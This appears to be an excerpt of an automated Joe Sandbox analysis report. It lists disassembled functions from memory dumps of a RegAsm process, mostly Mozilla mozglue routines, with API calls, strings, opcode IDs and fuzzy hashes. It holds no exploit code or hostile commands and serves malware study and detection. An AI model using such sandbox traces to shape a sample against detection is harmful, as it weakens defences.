                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                                                                                    • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                    • API String ID: 3805649505-2608361144
                                                                                                                                                                                                                                                    • Opcode ID: 415920042e6fbd1822c1b68531c2771c7186f54a37f60ab3ffa333fdd8daa2fd
                                                                                                                                                                                                                                                    • Instruction ID: 5747f089923852fe5175b14c07e13093e8b7064c1c93f89c58b32f7564fb8f64
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 415920042e6fbd1822c1b68531c2771c7186f54a37f60ab3ffa333fdd8daa2fd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC51D071A047058FD714CF28C19475AB7E6EB89708FA4893ED5AAC7B84DB70F801CB96
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C724630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                                                    • API String ID: 3732870572-2661126502
                                                                                                                                                                                                                                                    • Opcode ID: 0cc41241f37a9133786b5eca692e728662998f34292b7f49325a30590160372d
                                                                                                                                                                                                                                                    • Instruction ID: 1157d7523fdb60ec24386c3710552b596dd1b1cfa9e9a66d29d3d6c3d66e431c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cc41241f37a9133786b5eca692e728662998f34292b7f49325a30590160372d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20418871F047089BCB08DF78D94515EBBE6EF85358F10863EE899A7781EB349844C751
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C749830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C74985D
                                                                                                                                                                                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C74987D
                                                                                                                                                                                                                                                    • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C7498DE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C7498D9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                                                                                                                                                                                                    • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                                                                                                                                                                                    • API String ID: 1778083764-3290996778
                                                                                                                                                                                                                                                    • Opcode ID: b41736cbecc2ec4c2d08c61fc468d8e268dd8d1cb2257f4daf00ece08a3c471d
                                                                                                                                                                                                                                                    • Instruction ID: 49f0844f1199727ff48b454972d75c31255e1262f01d9995d20e7ecdc7dc9618
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b41736cbecc2ec4c2d08c61fc468d8e268dd8d1cb2257f4daf00ece08a3c471d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA3105B1B002086BDB14AF59DD489EF77E9DF88318F50802DEA1A9BB40DB3169058BE1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7246E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C724721
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C713EBD,00000017,?,00000000,?,6C713EBD,?,?,6C6D42D2), ref: 6C6D4444
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                                                                                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                                                                                                                                                                                    • API String ID: 680628322-2661126502
                                                                                                                                                                                                                                                    • Opcode ID: 94ecd9ab75b506a5f69704e2f089d8bc72f66c320d0ed108888b9bfe80da9ed5
                                                                                                                                                                                                                                                    • Instruction ID: 1bab531581ee2e6470c0ceaa72ec80ed3c7bc83de36fb43d53dfd0b6cb7a90e8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94ecd9ab75b506a5f69704e2f089d8bc72f66c320d0ed108888b9bfe80da9ed5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 583146B1F042084BCB0CCF7DD98529EBBE6DB89324F55813EE8159BB81EB7498048B90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040F460 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0040F4EF
                                                                                                                                                                                                                                                      • Part of subcall function 00419196: std::exception::_Copy_str.LIBCMT ref: 004191B1
                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040F504
                                                                                                                                                                                                                                                      • Part of subcall function 00419249: RaiseException.KERNEL32(?,0040F509,-00000208,|nB,?,0040F509,0040FB00,0042BC34,-00000208), ref: 0041928B
                                                                                                                                                                                                                                                      • Part of subcall function 0040F380: std::exception::exception.LIBCMT ref: 0040F3AF
                                                                                                                                                                                                                                                      • Part of subcall function 0040F380: __CxxThrowException@8.LIBCMT ref: 0040F3C4
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F54B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisememcpystd::exception::_
                                                                                                                                                                                                                                                    • String ID: |nB
                                                                                                                                                                                                                                                    • API String ID: 2091982303-3238407859
                                                                                                                                                                                                                                                    • Opcode ID: 859db08ed6faef6703455f35d8a99574dd2d5ea96faba9e99d9cc381962d9069
                                                                                                                                                                                                                                                    • Instruction ID: ac98e3361a73ce5637a895dd36a831096c0ef8c0a65fa9f60b0ed2364c1c9d28
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 859db08ed6faef6703455f35d8a99574dd2d5ea96faba9e99d9cc381962d9069
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4431FB71D00215ABCB24DF68C88079EBBB4EB44360F54423FE826A7BC1D338A944CBE5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C72B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C713EBD,6C713EBD,00000000), ref: 6C6D42A9
                                                                                                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6C72B127), ref: 6C72B463
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C72B4C9
                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C72B4E4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                                                    • String ID: pid:
                                                                                                                                                                                                                                                    • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                                                    • Opcode ID: 729170f4b14b90ad0787cfd79fc9eec14a1feb6e106e93a0758d460ad97dd77c
                                                                                                                                                                                                                                                    • Instruction ID: 25d7161cde29028d428bf4087bdf3e06fd56e0e94dfe74642a327e493a3afbea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 729170f4b14b90ad0787cfd79fc9eec14a1feb6e106e93a0758d460ad97dd77c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38310331A012089BDB00DFAAD980AEEB7B5FF49318F940529D8226BA41D735B945CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6EBF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C737A3F), ref: 6C6EBF11
                                                                                                                                                                                                                                                    • ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C737A3F), ref: 6C6EBF5D
                                                                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C737A3F), ref: 6C6EBF7E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
                                                                                                                                                                                                                                                    • String ID: tl
                                                                                                                                                                                                                                                    • API String ID: 4279176481-2603243157
                                                                                                                                                                                                                                                    • Opcode ID: 5c608f16e427931b4f90e5153da6903912ff8a2a68ace2807eac88733cf5b028
                                                                                                                                                                                                                                                    • Instruction ID: c73a7d555f153348dce7ac5ca259edaf4f3d5745003faa7f169c1ac0d55a6e17
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c608f16e427931b4f90e5153da6903912ff8a2a68ace2807eac88733cf5b028
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B611BF792007048FC729CF0CD69992AFBF8FB5931535588ADE98A8B760C732B800CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6DF100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(shell32,?,6C74D020), ref: 6C6DF122
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6DF132
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                    • String ID: SHGetKnownFolderPath$shell32
                                                                                                                                                                                                                                                    • API String ID: 2574300362-1045111711
                                                                                                                                                                                                                                                    • Opcode ID: 8cd6a433bfe68f19b3e6432f224f86f2e9f6d71d87ecd5441091bcaed5bdd10e
                                                                                                                                                                                                                                                    • Instruction ID: 93d64e1b8c0a0445b3b3738497a53aa2288251853a5b6a2b91926593e6dcbf9b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cd6a433bfe68f19b3e6432f224f86f2e9f6d71d87ecd5441091bcaed5bdd10e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6015E717012199BCF008F65DC48AAB7BF8FF4A794B910528E849E7200DB30BA00CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71E577
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71E584
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71E5DE
                                                                                                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C71E8A6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                                                                                                    • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$[I %d/%d] profiler_start
                                                                                                                                                                                                                                                    • API String ID: 1483687287-1611356987
                                                                                                                                                                                                                                                    • Opcode ID: 76c1544acf4261b30ed776eaf68d9b4eb3041a619f4e8aa40789ca0a68fb4ada
                                                                                                                                                                                                                                                    • Instruction ID: f3bdc4a10fb6a6a84aa75d0629a6d23ee13ce4d4cc793618139f2130f49d8fb9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76c1544acf4261b30ed776eaf68d9b4eb3041a619f4e8aa40789ca0a68fb4ada
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C411AD31A04258DFCB009F15C948A6ABBF8FBC9328FD40629E89697A50CF70A905CB95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C720C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C720CD5
                                                                                                                                                                                                                                                      • Part of subcall function 6C70F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,6C6E5407), ref: 6C70F9A7
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C720D40
                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C720DCB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6F5EDB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: memset.VCRUNTIME140(ewsl,000000E5,?), ref: 6C6F5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6F5FB2
                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C720DDD
                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C720DF2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4069420150-0
                                                                                                                                                                                                                                                    • Opcode ID: d3c34d38779afc1a1918f331dc558503b34e02595ab4b2125822ee9e17f88417
                                                                                                                                                                                                                                                    • Instruction ID: 506b9474b2e7b62a55c2b07187fae7e756ea1bf7b2ddfcad32c1078b2740b658
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3c34d38779afc1a1918f331dc558503b34e02595ab4b2125822ee9e17f88417
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F413B719097848BD320CF29C28179EFBE5BFC9714F508A2EE8D887750DB749945CB92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C729120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C729188
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008), ref: 6C7291BB
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,00000008,0000000F), ref: 6C7291EB
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008), ref: 6C729200
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C729219
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: malloc$freememcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4259248891-0
                                                                                                                                                                                                                                                    • Opcode ID: 566a9c3f28b60cfbda487d30b26dac3abf7082fa268b960fa85785dd2b590d79
                                                                                                                                                                                                                                                    • Instruction ID: 7f6e56bc6c910916b6c290676d38b07467131ce4a95ba7f7c9e958bce786c0c5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 566a9c3f28b60cfbda487d30b26dac3abf7082fa268b960fa85785dd2b590d79
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D314531A006058FEB00DF68DD4476A73E9EF95315F598639D85ADB641FF34E808CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C710800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C710838
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C71084C
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6C7108AF
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C7108BD
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C7108D5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
